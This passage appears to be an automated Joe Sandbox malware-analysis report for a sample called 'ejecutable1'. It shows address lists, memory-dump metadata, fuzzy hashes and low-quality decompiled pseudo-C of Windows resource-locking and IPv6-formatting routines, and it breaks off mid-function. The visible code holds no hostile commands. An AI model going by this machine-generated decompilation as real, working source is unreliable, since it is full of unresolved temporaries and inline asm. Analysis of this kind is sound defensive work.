                                                                    0x008d13ff
                                                                    0x008d1406
                                                                    0x008fe9cc
                                                                    0x008fe9d2
                                                                    0x008fe9d2
                                                                    0x008fe9cc
                                                                    0x008d140c
                                                                    0x008d1411
                                                                    0x008d1431
                                                                    0x008d143a
                                                                    0x008d143c
                                                                    0x008d143f
                                                                    0x008d143f
                                                                    0x008d1442
                                                                    0x008d1447
                                                                    0x008d14a8
                                                                    0x008d14ac
                                                                    0x008fe9e2
                                                                    0x008fe9e7
                                                                    0x008fe9ec
                                                                    0x008fea05
                                                                    0x008fea05
                                                                    0x00000000
                                                                    0x008d1449
                                                                    0x00000000
                                                                    0x008d1449
                                                                    0x008d144c
                                                                    0x008d1459
                                                                    0x008d1462
                                                                    0x008d1469
                                                                    0x008d146a
                                                                    0x008d1470
                                                                    0x008d1473
                                                                    0x008d1476
                                                                    0x008d1476
                                                                    0x008d1490
                                                                    0x008d1495
                                                                    0x008d138e
                                                                    0x008d1390
                                                                    0x008d1397
                                                                    0x008d1398
                                                                    0x008d1399
                                                                    0x008d13a1
                                                                    0x008d13a4
                                                                    0x008d13a4
                                                                    0x008d1498
                                                                    0x008d149c
                                                                    0x008d149f
                                                                    0x008d14a2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008d14a4
                                                                    0x00000000
                                                                    0x008d14a4
                                                                    0x008d1413
                                                                    0x008d1415
                                                                    0x008d1416
                                                                    0x008d1419
                                                                    0x008d141c
                                                                    0x008d1422
                                                                    0x008d13b7
                                                                    0x008d13bc
                                                                    0x008d13bf
                                                                    0x008d13bf
                                                                    0x008d13c2
                                                                    0x008d1424
                                                                    0x008d1424
                                                                    0x008d1424
                                                                    0x008d1427
                                                                    0x008d142b
                                                                    0x008d142c
                                                                    0x008d142c
                                                                    0x008d142c
                                                                    0x00000000
                                                                    0x008d141c
                                                                    0x008d1411

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 79f5da4cfdc4f7dba5f1aa29745935c0559f11567ccd59f5cad425b4ba28f488
                                                                    • Instruction ID: f9805cbec8dd694a86ea06202bdcfce599d7d11d067884555c0d3af110977587
                                                                    • Opcode Fuzzy Hash: 79f5da4cfdc4f7dba5f1aa29745935c0559f11567ccd59f5cad425b4ba28f488
                                                                    • Instruction Fuzzy Hash: B2612871A00659B6CF28DF6DC8848BE7BB6FF94300718C22EE5D6C7741D678AA40CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008D0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 49%
                                                                    			E008D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009701c0;
									_push(_t144);
									_push(0);
									_t51 = L0088F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L008D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L008E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0091217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L008D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009701c0;
												_push(_t138);
												_push(0);
												_t58 = L0088F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L008D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L008E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0091217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L008E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L008D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L0088F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L008D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L0088F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L008D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L0088F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L008D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E008B5329(_t110, _t138);
																return E008B53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                    0x008d055a
                                                                    0x008d055d
                                                                    0x008d0563
                                                                    0x008d0566
                                                                    0x008d05d8
                                                                    0x008d05e2
                                                                    0x008d05e5
                                                                    0x00000000
                                                                    0x008d05e7
                                                                    0x008d05e7
                                                                    0x008d05ea
                                                                    0x008d05f3
                                                                    0x008d05f3
                                                                    0x008d0568
                                                                    0x008d0568
                                                                    0x008d0568
                                                                    0x008d0569
                                                                    0x008d0569
                                                                    0x008d0569
                                                                    0x008d056b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f217f
                                                                    0x008f2183
                                                                    0x008f225b
                                                                    0x008f225f
                                                                    0x008f2189
                                                                    0x008f218c
                                                                    0x008f218f
                                                                    0x008f2194
                                                                    0x008f2199
                                                                    0x008f219d
                                                                    0x008f21a0
                                                                    0x008f21a2
                                                                    0x008f21ce
                                                                    0x008f21ce
                                                                    0x008f21ce
                                                                    0x008f21d0
                                                                    0x008f21d6
                                                                    0x008f21de
                                                                    0x008f21e2
                                                                    0x008f21e8
                                                                    0x008f21e9
                                                                    0x008f21ec
                                                                    0x008f21f1
                                                                    0x008f21f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f21f8
                                                                    0x008f21fb
                                                                    0x008f2206
                                                                    0x008f220b
                                                                    0x008f220c
                                                                    0x008f2217
                                                                    0x008f2226
                                                                    0x008f222b
                                                                    0x008f222c
                                                                    0x008f222f
                                                                    0x008f2232
                                                                    0x008f2235
                                                                    0x008f2235
                                                                    0x008f223a
                                                                    0x008f223f
                                                                    0x008f2241
                                                                    0x008f2243
                                                                    0x008f2248
                                                                    0x008f2248
                                                                    0x008f224d
                                                                    0x008f224f
                                                                    0x008f2262
                                                                    0x008f2263
                                                                    0x008f2268
                                                                    0x008f2269
                                                                    0x008f2269
                                                                    0x008f2269
                                                                    0x008f226d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f2276
                                                                    0x008f2279
                                                                    0x008f227e
                                                                    0x008f2283
                                                                    0x008f2287
                                                                    0x008f228a
                                                                    0x008f228d
                                                                    0x008f228f
                                                                    0x008f22bc
                                                                    0x008f22bc
                                                                    0x008f22bc
                                                                    0x008f22be
                                                                    0x008f22c4
                                                                    0x008f22cc
                                                                    0x008f22d0
                                                                    0x008f22d6
                                                                    0x008f22d7
                                                                    0x008f22da
                                                                    0x008f22df
                                                                    0x008f22e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22e6
                                                                    0x008f22e9
                                                                    0x008f22f4
                                                                    0x008f22f9
                                                                    0x008f22fa
                                                                    0x008f2305
                                                                    0x008f2314
                                                                    0x008f2319
                                                                    0x008f231a
                                                                    0x008f231d
                                                                    0x008f2320
                                                                    0x008f2323
                                                                    0x008f2323
                                                                    0x008f2328
                                                                    0x008f232d
                                                                    0x008f232f
                                                                    0x008f2331
                                                                    0x008f2336
                                                                    0x008f2336
                                                                    0x008f233b
                                                                    0x008f233d
                                                                    0x008f2350
                                                                    0x008f2351
                                                                    0x008f2356
                                                                    0x008f2359
                                                                    0x008f2359
                                                                    0x008f235b
                                                                    0x008f235d
                                                                    0x008b5367
                                                                    0x008b536b
                                                                    0x008b5372
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f2363
                                                                    0x008f2363
                                                                    0x008f2369
                                                                    0x008f236a
                                                                    0x008f236c
                                                                    0x008f2371
                                                                    0x008f2373
                                                                    0x00000000
                                                                    0x008f2379
                                                                    0x008f2379
                                                                    0x008f237a
                                                                    0x008f237f
                                                                    0x008f237f
                                                                    0x008f2385
                                                                    0x008f2386
                                                                    0x008f2389
                                                                    0x008f238e
                                                                    0x008f2390
                                                                    0x008b5378
                                                                    0x008b537c
                                                                    0x008f2396
                                                                    0x008f2396
                                                                    0x008f2397
                                                                    0x008f239c
                                                                    0x008f23a2
                                                                    0x008f23a3
                                                                    0x008f23a6
                                                                    0x008f23ab
                                                                    0x008f23ad
                                                                    0x00000000
                                                                    0x008f23b3
                                                                    0x008f23b3
                                                                    0x008f23b4
                                                                    0x008f23b9
                                                                    0x008f23ba
                                                                    0x008f23ba
                                                                    0x008f23bc
                                                                    0x008f23bf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008e9153
                                                                    0x008e9158
                                                                    0x008e915a
                                                                    0x008e915e
                                                                    0x008e9160
                                                                    0x00000000
                                                                    0x008e9166
                                                                    0x008e9166
                                                                    0x008e9171
                                                                    0x008e9176
                                                                    0x008e9176
                                                                    0x00000000
                                                                    0x008e9160
                                                                    0x008f23c6
                                                                    0x008f23d7
                                                                    0x008f23d7
                                                                    0x008f23ad
                                                                    0x008f2390
                                                                    0x008f2373
                                                                    0x008f233f
                                                                    0x008f233f
                                                                    0x00000000
                                                                    0x008f233f
                                                                    0x008f2291
                                                                    0x008f2291
                                                                    0x008f2293
                                                                    0x008f2295
                                                                    0x008f229a
                                                                    0x008f22a1
                                                                    0x008f22a3
                                                                    0x008f22a7
                                                                    0x008f22a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22ab
                                                                    0x008f22ad
                                                                    0x008f22af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22af
                                                                    0x008f22b1
                                                                    0x008f22b4
                                                                    0x008f22b4
                                                                    0x008f22b6
                                                                    0x008b53be
                                                                    0x008b53be
                                                                    0x008b53be
                                                                    0x008b53c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008b53cb
                                                                    0x008b53ce
                                                                    0x008b53d0
                                                                    0x008b53d4
                                                                    0x008b53d6
                                                                    0x00000000
                                                                    0x008b53d8
                                                                    0x008b53e3
                                                                    0x008b53ea
                                                                    0x008b53ea
                                                                    0x00000000
                                                                    0x008b53d6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f22b6
                                                                    0x00000000
                                                                    0x008f228f
                                                                    0x008f2349
                                                                    0x008f234d
                                                                    0x008f2251
                                                                    0x008f2251
                                                                    0x00000000
                                                                    0x008f2251
                                                                    0x008f21a4
                                                                    0x008f21a4
                                                                    0x008f21a6
                                                                    0x008f21a8
                                                                    0x008f21ac
                                                                    0x008f21b6
                                                                    0x008f21b8
                                                                    0x008f21bc
                                                                    0x008f21be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f21c0
                                                                    0x008f21c2
                                                                    0x008f21c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f21c4
                                                                    0x008f21c6
                                                                    0x008f21c6
                                                                    0x008f21c8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008f21c8
                                                                    0x008f21a2
                                                                    0x00000000
                                                                    0x008f2183
                                                                    0x008d057b
                                                                    0x008d057d
                                                                    0x008d0581
                                                                    0x008d0583
                                                                    0x008f2178
                                                                    0x00000000
                                                                    0x008d0589
                                                                    0x008d058f
                                                                    0x008d058f
                                                                    0x008d0583
                                                                    0x00000000

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F2206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-4236105082
                                                                    • Opcode ID: 3a36cad541c3b1a8745596b6d7d5b600488f5d3e9e098e6f902c22e31aedbadc
                                                                    • Instruction ID: 9733c2f1b7c8a9b6357dc84b03aa8b10b6fa0e8b969a6f341ab21dc7cd1ce415
                                                                    • Opcode Fuzzy Hash: 3a36cad541c3b1a8745596b6d7d5b600488f5d3e9e098e6f902c22e31aedbadc
                                                                    • Instruction Fuzzy Hash: DF514C31B002056BDB14DA28CC81FB673A9FF95714F254229FE58DB385D971EC418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008D14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E008D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x972088; // 0x777ffed6
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = L008C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = L008C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = L008C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00892340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0089E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                    0x008d14c0
                                                                    0x008d14cb
                                                                    0x008d14d2
                                                                    0x008d14d6
                                                                    0x008d14da
                                                                    0x008d14de
                                                                    0x008d14e3
                                                                    0x008d157a
                                                                    0x008d157a
                                                                    0x008d14f1
                                                                    0x008d14f3
                                                                    0x008fea0f
                                                                    0x00000000
                                                                    0x008fea15
                                                                    0x00000000
                                                                    0x008fea15
                                                                    0x008d14f9
                                                                    0x008d14f9
                                                                    0x008d14fe
                                                                    0x008d1504
                                                                    0x008fea1a
                                                                    0x008fea1f
                                                                    0x008fea21
                                                                    0x008fea22
                                                                    0x008fea27
                                                                    0x008fea2a
                                                                    0x008fea2a
                                                                    0x008d1515
                                                                    0x008d1517
                                                                    0x008d156d
                                                                    0x008d1572
                                                                    0x008d1575
                                                                    0x008d1575
                                                                    0x008d151e
                                                                    0x008fea50
                                                                    0x008fea55
                                                                    0x008fea58
                                                                    0x008fea58
                                                                    0x008d152e
                                                                    0x008d1531
                                                                    0x008d1533
                                                                    0x00000000
                                                                    0x008d1535
                                                                    0x008d1541
                                                                    0x008d1549
                                                                    0x008d1549
                                                                    0x008d1533
                                                                    0x008d14f3
                                                                    0x008d1559

                                                                    APIs
                                                                    • ___swprintf_l.LIBCMT ref: 008FEA22
                                                                      • Part of subcall function 008D13CB: ___swprintf_l.LIBCMT ref: 008D146B
                                                                      • Part of subcall function 008D13CB: ___swprintf_l.LIBCMT ref: 008D1490
                                                                    • ___swprintf_l.LIBCMT ref: 008D156D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 8ffdb60663d5b0e13690cd6ab59bf216a2de8c5d5925880a6b733c6d4bec7d37
                                                                    • Instruction ID: 043ca6f9231e86c2e0280d588da815a0e106ebac2fc03cb8c0c15df963e11d90
                                                                    • Opcode Fuzzy Hash: 8ffdb60663d5b0e13690cd6ab59bf216a2de8c5d5925880a6b733c6d4bec7d37
                                                                    • Instruction Fuzzy Hash: F821B17290022DABCF20EE68DC45AEA77BCFF50704F444216F946D3240DB79DA588BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E008B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009701c0;
									_push(_t92);
									_push(0);
									_t37 = L0088F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L008D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L008E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0091217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L008D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E008B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L0088F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L008D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L0088F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L008D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
